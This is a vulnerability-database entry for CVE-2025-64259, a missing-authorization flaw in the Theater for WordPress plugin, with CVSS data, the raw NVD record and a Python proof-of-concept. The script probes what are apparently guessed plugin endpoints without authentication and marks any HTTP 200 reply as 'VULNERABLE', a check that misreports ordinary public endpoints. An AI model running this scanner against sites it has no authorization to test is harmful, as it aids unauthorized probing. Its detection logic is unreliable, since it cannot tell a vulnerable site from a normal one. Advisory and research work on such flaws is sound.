Security Vulnerability Report
中文
CVE-2025-64259 CVSS 5.3 MEDIUM

CVE-2025-64259

Published: 2025-11-13 10:15:51
Last Modified: 2026-04-27 16:16:38

Description

Missing Authorization vulnerability in Jeroen Schmit Theater for WordPress theatre allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Theater for WordPress: from n/a through <= 0.18.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Theater for WordPress <= 0.18.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64259 PoC - Missing Authorization in Theater for WordPress # Affected: Theater for WordPress <= 0.18.8 # Type: Broken Access Control / Missing Authorization import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64259 Missing Authorization in Theater for WordPress plugin """ # Common vulnerable endpoints in Theater plugin endpoints = [ '/wp-json/theatre/v1/', '/wp-json/theatre/v1/events', '/wp-json/theatre/v1/shows', '/wp-admin/admin-ajax.php?action=theatre_get', '/wp-admin/admin-ajax.php?action=theatre_admin' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64259 - Missing Authorization PoC") print("-" * 50) for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) # Check if we can access the endpoint without auth if response.status_code == 200: print(f"[+] VULNERABLE: {url}") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes") elif response.status_code == 403: print(f"[-] Protected: {url}") else: print(f"[*] Endpoint: {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {e}") print("-" * 50) print("[*] PoC completed") print("[*] If vulnerable endpoints were found, the plugin lacks proper authorization checks") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-64259.py <target_url>") print("Example: python cve-2025-64259.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64259", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:51.140", "lastModified": "2026-04-27T16:16:38.373", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Jeroen Schmit Theater for WordPress theatre allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Theater for WordPress: from n/a through <= 0.18.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/theatre/vulnerability/wordpress-theater-for-wordpress-plugin-0-18-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}